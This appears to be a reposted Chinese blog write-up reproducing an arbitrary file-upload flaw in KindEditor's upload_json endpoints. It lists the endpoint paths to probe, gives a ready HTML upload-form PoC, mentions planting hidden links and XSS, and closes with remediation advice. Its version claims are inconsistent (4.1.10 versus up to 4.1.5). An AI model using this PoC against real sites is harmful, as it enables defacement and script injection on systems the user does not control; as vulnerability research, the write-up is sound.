KindEditor 4.1.10 文件上传漏洞复现

admin 2023年5月12日15:36:10评论2,092 views字数 1911阅读6分22秒阅读模式


KindEditor 4.1.10 文件上传漏洞复现

漏洞存在于 kindeditor 编辑器里,你能上传.txt 和.html 文件,支持 php/asp/jsp/asp.net,漏洞存在于小于等于 kindeditor4.1.5 编辑器中 这里 html 里面可以嵌套暗链接地址以及嵌套 xss。Kindeditor 上的 uploadbutton.html 用 于 文 件 上 传 功 能 页 面 , 直 接 POST 到 /upload_json.*?dir=file , 在 允 许 上 传 的 文 件 扩 展 名 中 包 含 htm,txt:extTable.Add(“file”,”doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2”) 根本脚本语言自定义不同的上传地址,上传之前有必要验证文件 upload_json.* 的存在
/asp/upload_json.asp /asp.net/upload_json.ashx /jsp/upload_json.jsp /php/upload_json.php

可目录变量查看是否存在那种脚本上传漏洞:kindeditor/asp/upload_json.asp?dir=filekindeditor/asp.net/upload_json.ashx?dir=filekindeditor/jsp/upload_json.jsp?dir=filekindeditor/php/upload_json.php?dir=file版本是 4.1.10 可以进行尝试如下路径是否存在有必要验证文件 upload_json.*kindeditor/asp/upload_json.asp?dir=filekindeditor/asp.net/upload_json.ashx?dir=filekindeditor/jsp/upload_json.jsp?dir=filekindeditor/php/upload_json.php?dir=file

http://XXXX/Scripts/kindEditor/asp.net/upload_json.ashx?dir=file

这里也是发现存在该接口。如图可以看出存在上传点:

KindEditor 4.1.10 文件上传漏洞复现

写出下面的构造上传 poc,这里需要修改...以及 url : 的内容,根据实际情况修改.

Upload a new file:

<html>

<form enctype="multipart/form-data" 

action="http://XXXX/Scripts/kindEditor/asp.net/upload_json.ashx?dir=file" 

method="post"> 

Upload a new file:<br> 

<input type="file" name="imgFile" size="50"><br> 

<input type="submit" value="Upload"> 

</form>

</html

<html>

<form enctype="multipart/form-data" 

action="http://XXXX/Scripts/kindEditor/asp.net/upload_json.ashx?dir=file" 

method="post"> 

Upload a new file:<br> 

<input type="file" name="imgFile" size="50"><br> 

<input type="submit" value="Upload"> 

</form>

</html>


<html><form enctype="multipart/form-data" action="http://XXXX/Scripts/kindEditor/asp.net/upload_json.ashx?dir=file" method="post"> Upload a new file:<br> <input type="file" name="imgFile" size="50"><br> <input type="submit" value="Upload"> </form></html>

将其保存为 html 然后在本地浏览器打开进行访问:

KindEditor 4.1.10 文件上传漏洞复现

上传一个文件:

KindEditor 4.1.10 文件上传漏洞复现


KindEditor 4.1.10 文件上传漏洞复现

将返回路径粘贴到 url 后面进行访问:

KindEditor 4.1.10 文件上传漏洞复现

发现上传成功。 

修复意见 :
直接删除 upload_json.和 file_manager_json升级 kindeditor 到最新版本参考连接:http://cn-sec.com/archives/721237.htmlhttps://www.cnblogs.com/backlion/p/10421405.htm


原文始发于微信公众号(爱喝酒烫头的曹操):KindEditor 4.1.10 文件上传漏洞复现

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年5月12日15:36:10
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   KindEditor 4.1.10 文件上传漏洞复现https://cn-sec.com/archives/1730145.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息